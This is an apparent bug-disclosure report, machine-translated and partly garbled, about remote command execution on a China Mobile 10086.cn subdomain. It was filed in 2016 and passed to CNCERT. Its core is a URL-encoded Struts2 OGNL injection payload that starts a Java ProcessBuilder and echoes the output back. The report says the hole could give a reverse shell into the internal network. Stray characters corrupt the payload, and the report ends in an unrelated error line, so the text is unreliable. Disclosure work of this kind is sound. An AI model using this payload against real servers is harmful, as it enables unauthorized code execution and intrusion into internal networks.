漏洞标题 中国移动10086.cn的子站命令执行可以威胁内网 相关制造商 中国移动 漏洞作者 过路人 提交时间 2016-04-27 17: 00 公共时间 2016-06-13 12: 40 漏洞类型 应用配置错误 危险等级 高 自我评估等级 15 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 漏洞详细信息 https://**。**。**。**/checkUidAvailable.action POST 重定向%3A%24%7B%23res%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23res.setCharacterEncoding%28%22UTF-8%22%29%2C%图23A%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22echo%22%2C%22test%20by%20d的%22%7D%29%29.start%28% 29%2C%23B%3D%23a.getInputStream%28%29%2C%23C%3Dnew%** ** ** **。InputStreamReader的%28%23B%29%2C%23D%3Dnew%** ** ** **。的BufferedReader%28%23℃%29%2C%23E%3Dnew%20char%5B9%5D%2C%23d.read%28%23E%29%2C%23res.getWriter%28% 29.println%28%23E%29%2C%23res.getWriter%28%29.flush%28%29%2C%23res.getWriter%28%29.close%28%29%7D
漏洞证明: https://**。**。**。**/checkUidAvailable.action牺牲工具
内部网权限,如果反弹出来。可以获取大量敏感信息或漫游内部网络 从对等方接收数据时失败